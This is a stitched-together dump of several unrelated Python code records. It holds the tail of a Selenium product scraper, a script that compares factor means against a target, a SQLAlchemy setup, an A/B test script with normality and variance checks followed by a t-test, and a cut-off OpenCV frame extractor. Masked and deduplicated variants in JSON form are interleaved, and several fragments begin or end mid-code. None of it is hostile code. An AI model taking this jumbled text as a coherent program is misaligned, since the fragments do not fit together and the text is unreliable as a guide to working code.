                            price_old = offer.find_element_by_class_name('priceOld')\n
                            csv_price_old = price_old.text.split(' ')[0]\n
                        except:\n
                            self.loggger.info('price4 non-exist')\n
                            csv_price_new = ''\n
                            csv_price_old = ''\n
\n
                    try:\n
                        desc = offer.find_element_by_id('pDesc')\n
                        csv_desc = desc.get_attribute('innerHTML').replace(',', '-').replace('\\n', ' ').replace('\\r', '').rstrip().lstrip()\n
                    except:\n
                        self.loggger.info('description4 non-exist')\n
                        csv_desc = ''\n
\n
                    try:\n
                        article_number = offer.find_element_by_id('pManufacturer')\n
                        csv_article_number = article_number.text.split(' ')[-1].replace(',', '.')\n
                    except:\n
                        self.loggger.info('article number4 non-exist')\n
                        csv_article_number = ''\n
\n
                    try:\n
                        pimages = offer.find_elements_by_xpath('.//img')\n
                        csv_image_url = []\n
                        for pimage in pimages:\n
                            image_url = pimage.get_attribute('src')\n
                            if image_url not in csv_image_url:\n
                                csv_image_url.append(image_url)\n
                    except:\n
                        self.loggger.info('image4 non-exist')\n
\n
                    ######################################### CSV File Writing #########################################\n
                    if csv_image_url:\n
                        cats = list4_categories[m].split('/')\n
                        images = (csv_image_url + [' '] * 18)[:18]\n
                        file.write(','.join(['NEW', csv_article_number, cats[1], cats[2], cats[3], csv_heading, csv_desc, csv_price_new, csv_price_old] + images + [' ', csv_stock, list4[m]]) + '\\n')\n
            except Exception as e:\n
                self.loggger.info(e)\n
                self.loggger.info('error4')\n
\n
        file.close()\n
        self.driver.close()\n",
"step-ids": [
2,
3,
5,
6,
7
]
}
|
[
2,
3,
5,
6,
7
] |
import pandas as pd
import numpy as np
import sys
#Best Mean Test
if len(sys.argv) <= 3:
print("Not enough args usage: anova.py <*.csv> <rv1,rv2> <target to beat>")
print("ex: best-mean.py testdata.csv nicdrop 95000")
print("<rv> is response variable")
exit()
target_to_beat = int(sys.argv[3]) #target sample mean to beat
rv = sys.argv[2].split(',')
data = pd.read_csv(sys.argv[1], header=[0,1])
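#CSV has a two-row header -> MultiIndex columns; keep the rv[0] response block plus 'factors', then flatten to the second header row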
response_var = data[[rv[0],'factors']]
response_var.columns = response_var.columns.get_level_values(1)
print("Re-run factor means")
print(response_var.groupby('code')[rv[1]].mean())
print("Lowest observed sample mean (target to beat)")
print(response_var.groupby('code')[rv[1]].mean().min())
#print factors still remaining as viable
candidate_factors_index = response_var.groupby('code')[rv[1]].mean().index.array.to_numpy() #all factors from csv
improved_factors_bools = (response_var.groupby('code')[rv[1]].mean() < target_to_beat).to_numpy() #boolean series
all = ""
i=0
for y in candidate_factors_index:
if improved_factors_bools[i]:
all = all + y + ","
i=i+1
print("Effects")
if len(all) == 0:
print("NONE")
exit()
print(all.rstrip(','))
|
normal
|
{
"blob_id": "b9e78629fe094d933fdc0ffa2f9d9d1880e78c12",
"index": 9078,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif len(sys.argv) <= 3:\n print('Not enough args usage: anova.py <*.csv> <rv1,rv2> <target to beat>')\n print('ex: best-mean.py testdata.csv nicdrop 95000')\n print('<rv> is response variable')\n exit()\n<mask token>\nprint('Re-run factor means')\nprint(response_var.groupby('code')[rv[1]].mean())\nprint('Lowest observed sample mean (target to beat)')\nprint(response_var.groupby('code')[rv[1]].mean().min())\n<mask token>\nfor y in candidiate_factors_index:\n if improved_factors_bools[i]:\n all = all + y + ','\n i = i + 1\nprint('Effects')\nif len(all) == 0:\n print('NONE')\n exit()\nprint(all.rstrip(','))\n",
"step-3": "<mask token>\nif len(sys.argv) <= 3:\n print('Not enough args usage: anova.py <*.csv> <rv1,rv2> <target to beat>')\n print('ex: best-mean.py testdata.csv nicdrop 95000')\n print('<rv> is response variable')\n exit()\ntarget_to_beat = int(sys.argv[3])\nrv = sys.argv[2].split(',')\ndata = pd.read_csv(sys.argv[1], header=[0, 1])\nresponse_var = data[[rv[0], 'factors']]\nresponse_var.columns = response_var.columns.get_level_values(1)\nprint('Re-run factor means')\nprint(response_var.groupby('code')[rv[1]].mean())\nprint('Lowest observed sample mean (target to beat)')\nprint(response_var.groupby('code')[rv[1]].mean().min())\ncandidiate_factors_index = response_var.groupby('code')[rv[1]].mean(\n ).index.array.to_numpy()\nimproved_factors_bools = (response_var.groupby('code')[rv[1]].mean() <\n target_to_beat).to_numpy()\nall = ''\ni = 0\nfor y in candidiate_factors_index:\n if improved_factors_bools[i]:\n all = all + y + ','\n i = i + 1\nprint('Effects')\nif len(all) == 0:\n print('NONE')\n exit()\nprint(all.rstrip(','))\n",
"step-4": "import pandas as pd\nimport numpy as np\nimport sys\nif len(sys.argv) <= 3:\n print('Not enough args usage: anova.py <*.csv> <rv1,rv2> <target to beat>')\n print('ex: best-mean.py testdata.csv nicdrop 95000')\n print('<rv> is response variable')\n exit()\ntarget_to_beat = int(sys.argv[3])\nrv = sys.argv[2].split(',')\ndata = pd.read_csv(sys.argv[1], header=[0, 1])\nresponse_var = data[[rv[0], 'factors']]\nresponse_var.columns = response_var.columns.get_level_values(1)\nprint('Re-run factor means')\nprint(response_var.groupby('code')[rv[1]].mean())\nprint('Lowest observed sample mean (target to beat)')\nprint(response_var.groupby('code')[rv[1]].mean().min())\ncandidiate_factors_index = response_var.groupby('code')[rv[1]].mean(\n ).index.array.to_numpy()\nimproved_factors_bools = (response_var.groupby('code')[rv[1]].mean() <\n target_to_beat).to_numpy()\nall = ''\ni = 0\nfor y in candidiate_factors_index:\n if improved_factors_bools[i]:\n all = all + y + ','\n i = i + 1\nprint('Effects')\nif len(all) == 0:\n print('NONE')\n exit()\nprint(all.rstrip(','))\n",
"step-5": "import pandas as pd\nimport numpy as np\nimport sys\n\n#Best Mean Test\nif len(sys.argv) <= 3:\n\tprint(\"Not enough args usage: anova.py <*.csv> <rv1,rv2> <target to beat>\")\n\tprint(\"ex: best-mean.py testdata.csv nicdrop 95000\")\n\tprint(\"<rv> is response variable\")\n\texit()\n\ntarget_to_beat = int(sys.argv[3]) #factors\nrv = sys.argv[2].split(',')\n\ndata = pd.read_csv(sys.argv[1], header=[0,1])\nresponse_var = data[[rv[0],'factors']]\nresponse_var.columns = response_var.columns.get_level_values(1)\n\nprint(\"Re-run factor means\")\nprint(response_var.groupby('code')[rv[1]].mean())\n\nprint(\"Lowest observed sample mean (target to beat)\")\nprint(response_var.groupby('code')[rv[1]].mean().min())\n\n#print factors still remaining as viable\ncandidiate_factors_index = response_var.groupby('code')[rv[1]].mean().index.array.to_numpy() #all factors from csv\nimproved_factors_bools = (response_var.groupby('code')[rv[1]].mean() < target_to_beat).to_numpy() #boolean series\nall = \"\"\ni=0\nfor y in candidiate_factors_index:\n\tif improved_factors_bools[i]:\n\t\tall = all + y + \",\"\n\ti=i+1\nprint(\"Effects\")\nif len(all) == 0:\n\tprint(\"NONE\")\n\texit()\nprint(all.rstrip(','))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
engine = create_engine('sqlite:///app/databases/fays-web-dev.db',
connect_args={'check_same_thread': False})
Session = sessionmaker(bind=engine)
session = Session()
Base = declarative_base()
<|reserved_special_token_1|>
from sqlalchemy import create_engine, Column, Integer, Float, String, Text, DateTime, Boolean, ForeignKey
from sqlalchemy.orm import sessionmaker, relationship
from sqlalchemy.ext.declarative import declarative_base
from flask_sqlalchemy import SQLAlchemy
engine = create_engine('sqlite:///app/databases/fays-web-dev.db',
connect_args={'check_same_thread': False})
Session = sessionmaker(bind=engine)
session = Session()
Base = declarative_base()
<|reserved_special_token_1|>
from sqlalchemy import create_engine, Column, Integer, Float, \
String, Text, DateTime, Boolean, ForeignKey
from sqlalchemy.orm import sessionmaker, relationship
from sqlalchemy.ext.declarative import declarative_base
from flask_sqlalchemy import SQLAlchemy
engine = create_engine('sqlite:///app/databases/fays-web-dev.db', connect_args={'check_same_thread':False})
Session = sessionmaker(bind=engine)
session = Session()
Base = declarative_base()
|
flexible
|
{
"blob_id": "3d2b8730953e9c2801eebc23b6fb56a1b5a55e3c",
"index": 6156,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nengine = create_engine('sqlite:///app/databases/fays-web-dev.db',\n connect_args={'check_same_thread': False})\nSession = sessionmaker(bind=engine)\nsession = Session()\nBase = declarative_base()\n",
"step-3": "from sqlalchemy import create_engine, Column, Integer, Float, String, Text, DateTime, Boolean, ForeignKey\nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom flask_sqlalchemy import SQLAlchemy\nengine = create_engine('sqlite:///app/databases/fays-web-dev.db',\n connect_args={'check_same_thread': False})\nSession = sessionmaker(bind=engine)\nsession = Session()\nBase = declarative_base()\n",
"step-4": "from sqlalchemy import create_engine, Column, Integer, Float, \\\n String, Text, DateTime, Boolean, ForeignKey\nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom flask_sqlalchemy import SQLAlchemy\n\nengine = create_engine('sqlite:///app/databases/fays-web-dev.db', connect_args={'check_same_thread':False})\nSession = sessionmaker(bind=engine)\nsession = Session()\nBase = declarative_base()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95
):
quantile_one = dataframe[variable].quantile(low_quantile)
quantile_three = dataframe[variable].quantile(up_quantile)
interquantile_range = quantile_three - quantile_one
up_limit = quantile_three + 1.5 * interquantile_range
low_limit = quantile_one - 1.5 * interquantile_range
return low_limit, up_limit
def has_outliers(dataframe, numeric_columns):
for col in numeric_columns:
low_limit, up_limit = outlier_thresholds(dataframe, col)
if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)
].any(axis=None):
number_of_outliers = dataframe[(dataframe[col] > up_limit) | (
dataframe[col] < low_limit)].shape[0]
print(col, ' : ', number_of_outliers, 'outliers')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
df_test.head()
df_control.head()
df_control.info()
df_test.info()
df_test.shape
df_control.shape
def outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95
):
quantile_one = dataframe[variable].quantile(low_quantile)
quantile_three = dataframe[variable].quantile(up_quantile)
interquantile_range = quantile_three - quantile_one
up_limit = quantile_three + 1.5 * interquantile_range
low_limit = quantile_one - 1.5 * interquantile_range
return low_limit, up_limit
def has_outliers(dataframe, numeric_columns):
for col in numeric_columns:
low_limit, up_limit = outlier_thresholds(dataframe, col)
if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)
].any(axis=None):
number_of_outliers = dataframe[(dataframe[col] > up_limit) | (
dataframe[col] < low_limit)].shape[0]
print(col, ' : ', number_of_outliers, 'outliers')
for var in df_control:
print(var, 'has ', has_outliers(df_control, [var]), 'Outliers')
for var in df_test:
print(var, 'has ', has_outliers(df_test, [var]), 'Outliers')
df_control['Purchase'].mean()
df_test['Purchase'].mean()
<|reserved_special_token_0|>
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
<|reserved_special_token_0|>
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
<|reserved_special_token_0|>
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
<|reserved_special_token_0|>
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
df_test = pd.read_excel('datasets/ab_testing_data.xlsx', sheet_name=
'Test Group')
df_control = pd.read_excel('datasets/ab_testing_data.xlsx', sheet_name=
'Control Group')
df_test.head()
df_control.head()
df_control.info()
df_test.info()
df_test.shape
df_control.shape
def outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95
):
quantile_one = dataframe[variable].quantile(low_quantile)
quantile_three = dataframe[variable].quantile(up_quantile)
interquantile_range = quantile_three - quantile_one
up_limit = quantile_three + 1.5 * interquantile_range
low_limit = quantile_one - 1.5 * interquantile_range
return low_limit, up_limit
def has_outliers(dataframe, numeric_columns):
for col in numeric_columns:
low_limit, up_limit = outlier_thresholds(dataframe, col)
if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)
].any(axis=None):
number_of_outliers = dataframe[(dataframe[col] > up_limit) | (
dataframe[col] < low_limit)].shape[0]
print(col, ' : ', number_of_outliers, 'outliers')
for var in df_control:
print(var, 'has ', has_outliers(df_control, [var]), 'Outliers')
for var in df_test:
print(var, 'has ', has_outliers(df_test, [var]), 'Outliers')
df_control['Purchase'].mean()
df_test['Purchase'].mean()
group_a = df_control['Purchase']
group_b = df_test['Purchase']
test_statistics, pvalue = shapiro(group_a)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
test_statistics, pvalue = shapiro(group_b)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
test_statistics, pvalue = stats.levene(group_a, group_b)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
test_statistics, pvalue = stats.ttest_ind(group_a, group_b, equal_var=True)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
<|reserved_special_token_1|>
import pandas as pd
from scipy.stats import shapiro
import scipy.stats as stats
df_test = pd.read_excel('datasets/ab_testing_data.xlsx', sheet_name=
'Test Group')
df_control = pd.read_excel('datasets/ab_testing_data.xlsx', sheet_name=
'Control Group')
df_test.head()
df_control.head()
df_control.info()
df_test.info()
df_test.shape
df_control.shape
def outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95
):
quantile_one = dataframe[variable].quantile(low_quantile)
quantile_three = dataframe[variable].quantile(up_quantile)
interquantile_range = quantile_three - quantile_one
up_limit = quantile_three + 1.5 * interquantile_range
low_limit = quantile_one - 1.5 * interquantile_range
return low_limit, up_limit
def has_outliers(dataframe, numeric_columns):
for col in numeric_columns:
low_limit, up_limit = outlier_thresholds(dataframe, col)
if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)
].any(axis=None):
number_of_outliers = dataframe[(dataframe[col] > up_limit) | (
dataframe[col] < low_limit)].shape[0]
print(col, ' : ', number_of_outliers, 'outliers')
for var in df_control:
print(var, 'has ', has_outliers(df_control, [var]), 'Outliers')
for var in df_test:
print(var, 'has ', has_outliers(df_test, [var]), 'Outliers')
df_control['Purchase'].mean()
df_test['Purchase'].mean()
group_a = df_control['Purchase']
group_b = df_test['Purchase']
test_statistics, pvalue = shapiro(group_a)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
test_statistics, pvalue = shapiro(group_b)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
test_statistics, pvalue = stats.levene(group_a, group_b)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
test_statistics, pvalue = stats.ttest_ind(group_a, group_b, equal_var=True)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
<|reserved_special_token_1|>
import pandas as pd
from scipy.stats import shapiro
import scipy.stats as stats
df_test = pd.read_excel("datasets/ab_testing_data.xlsx", sheet_name="Test Group")
df_control = pd.read_excel("datasets/ab_testing_data.xlsx", sheet_name="Control Group")
df_test.head()
df_control.head()
df_control.info()
df_test.info()
df_test.shape
df_control.shape
# Setting threshold value for outliers
def outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95):
quantile_one = dataframe[variable].quantile(low_quantile)
quantile_three = dataframe[variable].quantile(up_quantile)
interquantile_range = quantile_three - quantile_one
up_limit = quantile_three + 1.5 * interquantile_range
low_limit = quantile_one - 1.5 * interquantile_range
return low_limit, up_limit
# Checks for any outliers in the variable.
def has_outliers(dataframe, numeric_columns):
for col in numeric_columns:
low_limit, up_limit = outlier_thresholds(dataframe, col)
if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)].any(axis=None):
number_of_outliers = dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)].shape[0]
print(col, " : ", number_of_outliers, "outliers")
for var in df_control:
print(var, "has ", has_outliers(df_control, [var]), "Outliers")
for var in df_test:
print(var, "has ", has_outliers(df_test, [var]), "Outliers")
# How would you describe the hypothesis of the A / B test?
# H0 : There is no statistical difference between the control and test groups in terms of average number of purchases.
# H1 : There is a statistical difference between the control and test groups in terms of the average number of purchases.
df_control["Purchase"].mean()
df_test["Purchase"].mean()
group_a = df_control["Purchase"]
group_b = df_test["Purchase"]
# 1- Assumption Check
# 1.1 - Normality Assumption
test_statistics, pvalue = shapiro(group_a)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
# If p-value <0.05 HO rejected.
# If p-value is not <0.05 H0 CAN NOT be rejected.
# group_a is distributed normally.
test_statistics, pvalue = shapiro(group_b)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
# If p-value <0.05 HO rejected.
# If p-value is not <0.05 H0 CAN NOT be rejected.
# group_b is distributed normally.
# 1.2 - Variance Homogeneity Assumption
# H0: Variances Are Homogeneous
# H1: Variances Are Not Homogeneous
test_statistics, pvalue = stats.levene(group_a, group_b)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
# If p-value <0.05 HO rejected.
# If p-value is not <0.05 H0 CAN NOT be rejected.
# Variance homogeneity provided.
# HO: there is no statistical difference between the control and test groups in terms of average number of purchases.
# H1: there is a statistical difference between the control and test groups in terms of average number of purchases
# 1.1 Independent two-sample t-test if assumptions are provided (parametric test)
test_statistics, pvalue = stats.ttest_ind(group_a, group_b, equal_var=True)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
# Can we draw statistically significant conclusions?
# There is no statistically significant difference between the control group and test groups.
# The two groups are alike.
# Which test did you use? Why is that?
# We used the two-sample t-test (parametric test) since both assumptions are satisfied
# What is your advice to the customer?
# There is no statistical difference between average bidding and maximum bidding
# It can be preferred with a low cost per click.
# We can evaluate the differences in interaction gain and conversion rates and determine which method is more profitable.
# The test can be extended for 1 month.
# The number of observations can be increased.
|
flexible
|
{
"blob_id": "9e01ba8c489791ec35b86dffe12d0cedb5f09004",
"index": 3919,
"step-1": "<mask token>\n\n\ndef outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95\n ):\n quantile_one = dataframe[variable].quantile(low_quantile)\n quantile_three = dataframe[variable].quantile(up_quantile)\n interquantile_range = quantile_three - quantile_one\n up_limit = quantile_three + 1.5 * interquantile_range\n low_limit = quantile_one - 1.5 * interquantile_range\n return low_limit, up_limit\n\n\ndef has_outliers(dataframe, numeric_columns):\n for col in numeric_columns:\n low_limit, up_limit = outlier_thresholds(dataframe, col)\n if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)\n ].any(axis=None):\n number_of_outliers = dataframe[(dataframe[col] > up_limit) | (\n dataframe[col] < low_limit)].shape[0]\n print(col, ' : ', number_of_outliers, 'outliers')\n\n\n<mask token>\n",
"step-2": "<mask token>\ndf_test.head()\ndf_control.head()\ndf_control.info()\ndf_test.info()\ndf_test.shape\ndf_control.shape\n\n\ndef outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95\n ):\n quantile_one = dataframe[variable].quantile(low_quantile)\n quantile_three = dataframe[variable].quantile(up_quantile)\n interquantile_range = quantile_three - quantile_one\n up_limit = quantile_three + 1.5 * interquantile_range\n low_limit = quantile_one - 1.5 * interquantile_range\n return low_limit, up_limit\n\n\ndef has_outliers(dataframe, numeric_columns):\n for col in numeric_columns:\n low_limit, up_limit = outlier_thresholds(dataframe, col)\n if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)\n ].any(axis=None):\n number_of_outliers = dataframe[(dataframe[col] > up_limit) | (\n dataframe[col] < low_limit)].shape[0]\n print(col, ' : ', number_of_outliers, 'outliers')\n\n\nfor var in df_control:\n print(var, 'has ', has_outliers(df_control, [var]), 'Outliers')\nfor var in df_test:\n print(var, 'has ', has_outliers(df_test, [var]), 'Outliers')\ndf_control['Purchase'].mean()\ndf_test['Purchase'].mean()\n<mask token>\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\npvalue < 0.05\n<mask token>\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\npvalue < 0.05\n<mask token>\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\npvalue < 0.05\n<mask token>\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\n",
"step-3": "<mask token>\ndf_test = pd.read_excel('datasets/ab_testing_data.xlsx', sheet_name=\n 'Test Group')\ndf_control = pd.read_excel('datasets/ab_testing_data.xlsx', sheet_name=\n 'Control Group')\ndf_test.head()\ndf_control.head()\ndf_control.info()\ndf_test.info()\ndf_test.shape\ndf_control.shape\n\n\ndef outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95\n ):\n quantile_one = dataframe[variable].quantile(low_quantile)\n quantile_three = dataframe[variable].quantile(up_quantile)\n interquantile_range = quantile_three - quantile_one\n up_limit = quantile_three + 1.5 * interquantile_range\n low_limit = quantile_one - 1.5 * interquantile_range\n return low_limit, up_limit\n\n\ndef has_outliers(dataframe, numeric_columns):\n for col in numeric_columns:\n low_limit, up_limit = outlier_thresholds(dataframe, col)\n if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)\n ].any(axis=None):\n number_of_outliers = dataframe[(dataframe[col] > up_limit) | (\n dataframe[col] < low_limit)].shape[0]\n print(col, ' : ', number_of_outliers, 'outliers')\n\n\nfor var in df_control:\n print(var, 'has ', has_outliers(df_control, [var]), 'Outliers')\nfor var in df_test:\n print(var, 'has ', has_outliers(df_test, [var]), 'Outliers')\ndf_control['Purchase'].mean()\ndf_test['Purchase'].mean()\ngroup_a = df_control['Purchase']\ngroup_b = df_test['Purchase']\ntest_statistics, pvalue = shapiro(group_a)\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\npvalue < 0.05\ntest_statistics, pvalue = shapiro(group_b)\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\npvalue < 0.05\ntest_statistics, pvalue = stats.levene(group_a, group_b)\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\npvalue < 0.05\ntest_statistics, pvalue = stats.ttest_ind(group_a, group_b, equal_var=True)\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\n",
"step-4": "import pandas as pd\nfrom scipy.stats import shapiro\nimport scipy.stats as stats\ndf_test = pd.read_excel('datasets/ab_testing_data.xlsx', sheet_name=\n 'Test Group')\ndf_control = pd.read_excel('datasets/ab_testing_data.xlsx', sheet_name=\n 'Control Group')\ndf_test.head()\ndf_control.head()\ndf_control.info()\ndf_test.info()\ndf_test.shape\ndf_control.shape\n\n\ndef outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95\n ):\n quantile_one = dataframe[variable].quantile(low_quantile)\n quantile_three = dataframe[variable].quantile(up_quantile)\n interquantile_range = quantile_three - quantile_one\n up_limit = quantile_three + 1.5 * interquantile_range\n low_limit = quantile_one - 1.5 * interquantile_range\n return low_limit, up_limit\n\n\ndef has_outliers(dataframe, numeric_columns):\n for col in numeric_columns:\n low_limit, up_limit = outlier_thresholds(dataframe, col)\n if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)\n ].any(axis=None):\n number_of_outliers = dataframe[(dataframe[col] > up_limit) | (\n dataframe[col] < low_limit)].shape[0]\n print(col, ' : ', number_of_outliers, 'outliers')\n\n\nfor var in df_control:\n print(var, 'has ', has_outliers(df_control, [var]), 'Outliers')\nfor var in df_test:\n print(var, 'has ', has_outliers(df_test, [var]), 'Outliers')\ndf_control['Purchase'].mean()\ndf_test['Purchase'].mean()\ngroup_a = df_control['Purchase']\ngroup_b = df_test['Purchase']\ntest_statistics, pvalue = shapiro(group_a)\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\npvalue < 0.05\ntest_statistics, pvalue = shapiro(group_b)\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\npvalue < 0.05\ntest_statistics, pvalue = stats.levene(group_a, group_b)\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\npvalue < 0.05\ntest_statistics, pvalue = stats.ttest_ind(group_a, group_b, equal_var=True)\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\n",
"step-5": "import pandas as pd\r\nfrom scipy.stats import shapiro\r\nimport scipy.stats as stats\r\n\r\ndf_test = pd.read_excel(\"datasets/ab_testing_data.xlsx\", sheet_name=\"Test Group\")\r\ndf_control = pd.read_excel(\"datasets/ab_testing_data.xlsx\", sheet_name=\"Control Group\")\r\n\r\ndf_test.head()\r\ndf_control.head()\r\n\r\ndf_control.info()\r\ndf_test.info()\r\n\r\ndf_test.shape\r\ndf_control.shape\r\n\r\n\r\n# Setting threshold value for outliers\r\ndef outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95):\r\n quantile_one = dataframe[variable].quantile(low_quantile)\r\n quantile_three = dataframe[variable].quantile(up_quantile)\r\n interquantile_range = quantile_three - quantile_one\r\n up_limit = quantile_three + 1.5 * interquantile_range\r\n low_limit = quantile_one - 1.5 * interquantile_range\r\n return low_limit, up_limit\r\n\r\n\r\n# Checks for any outliers in the variable.\r\ndef has_outliers(dataframe, numeric_columns):\r\n for col in numeric_columns:\r\n low_limit, up_limit = outlier_thresholds(dataframe, col)\r\n if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)].any(axis=None):\r\n number_of_outliers = dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)].shape[0]\r\n print(col, \" : \", number_of_outliers, \"outliers\")\r\n\r\n\r\nfor var in df_control:\r\n print(var, \"has \", has_outliers(df_control, [var]), \"Outliers\")\r\n\r\nfor var in df_test:\r\n print(var, \"has \", has_outliers(df_test, [var]), \"Outliers\")\r\n\r\n# How would you describe the hypothesis of the A / B test?\r\n\r\n# H0 : There is no statistical difference between the control and test groups in terms of average number of purchases.\r\n# H1 : There is a statistical difference between the control and test groups in terms of the average number of purchases.\r\n\r\n\r\ndf_control[\"Purchase\"].mean()\r\ndf_test[\"Purchase\"].mean()\r\n\r\ngroup_a = df_control[\"Purchase\"]\r\ngroup_b = df_test[\"Purchase\"]\r\n\r\n# 1- Assumption Check\r\n\r\n# 1.1 - Normality Assumption\r\n\r\ntest_statistics, pvalue = shapiro(group_a)\r\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\r\n\r\npvalue < 0.05\r\n\r\n# If p-value <0.05 HO rejected.\r\n# If p-value is not <0.05 H0 CAN NOT be rejected.\r\n# group_a is distributed normally.\r\n\r\ntest_statistics, pvalue = shapiro(group_b)\r\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\r\n\r\npvalue < 0.05\r\n\r\n# If p-value <0.05 HO rejected.\r\n# If p-value is not <0.05 H0 CAN NOT be rejected.\r\n# group_b is distributed normally.\r\n\r\n# 1.2 - Variance Homogeneity Assumption\r\n\r\n# H0: Variances Are Homogeneous\r\n# H1: Variances Are Not Homogeneous\r\n\r\ntest_statistics, pvalue = stats.levene(group_a, group_b)\r\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\r\n\r\npvalue < 0.05\r\n\r\n# If p-value <0.05 HO rejected.\r\n# If p-value is not <0.05 H0 CAN NOT be rejected.\r\n# Variance homogeneity provided.\r\n\r\n# HO: there is no statistical difference between the control and test groups in terms of average number of purchases.\r\n# H1: there is a statistical difference between the control and test groups in terms of average number of purchases\r\n\r\n# 1.1 Independent two-sample t-test if assumptions are provided (parametric test)\r\ntest_statistics, pvalue = stats.ttest_ind(group_a, group_b, equal_var=True)\r\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\r\n\r\n# Can we make 
statistically significant results?\r\n\r\n# There is no statistically significant difference between the control group and test groups.\r\n# The two groups are alike.\r\n\r\n# Which test did you use? Why is that?\r\n\r\n# We used the two-sample t-test (parametric test) since both assumptions are satisfied\r\n\r\n# What is your advice to the customer?\r\n# There is no statistical difference between average bidding and maximum bidding\r\n# It can be preferred with a low cost per click.\r\n# We can evaluate the differences in interaction gain and conversion rates and determine which method is more profitable.\r\n# The test can be extended for 1 month.\r\n# The number of observations can be increased.\r\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import cv2
import numpy as np
import os
from tqdm import tqdm
DIR = '/home/nghiatruong/Desktop'
INPUT_1 = os.path.join(DIR, 'GOPR1806.MP4')
INPUT_2 = os.path.join(DIR, '20190715_180940.mp4')
INPUT_3 = os.path.join(DIR, '20190715_181200.mp4')
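# Sync points: frame RIGHT_SYNC_n of the right (GoPro) video lines up with frame LEFT_SYNC_n of phone clip n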
RIGHT_SYNC_1 = 1965
LEFT_SYNC_1 = 1700
RIGHT_SYNC_2 = 5765
LEFT_SYNC_2 = 1282
def add_frame_id(video, output_dir):
reader = cv2.VideoCapture(video)
if not reader.isOpened():
return -1
os.makedirs(output_dir, exist_ok=True)
frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))
for frame_id in tqdm(range(frame_count)):
has_frame, frame = reader.read()
if not has_frame:
break
cv2.imwrite(os.path.join(output_dir, f'{frame_id}.jpg'), frame)
reader.release()
return 0
def get_meta(video):
reader = cv2.VideoCapture(video)
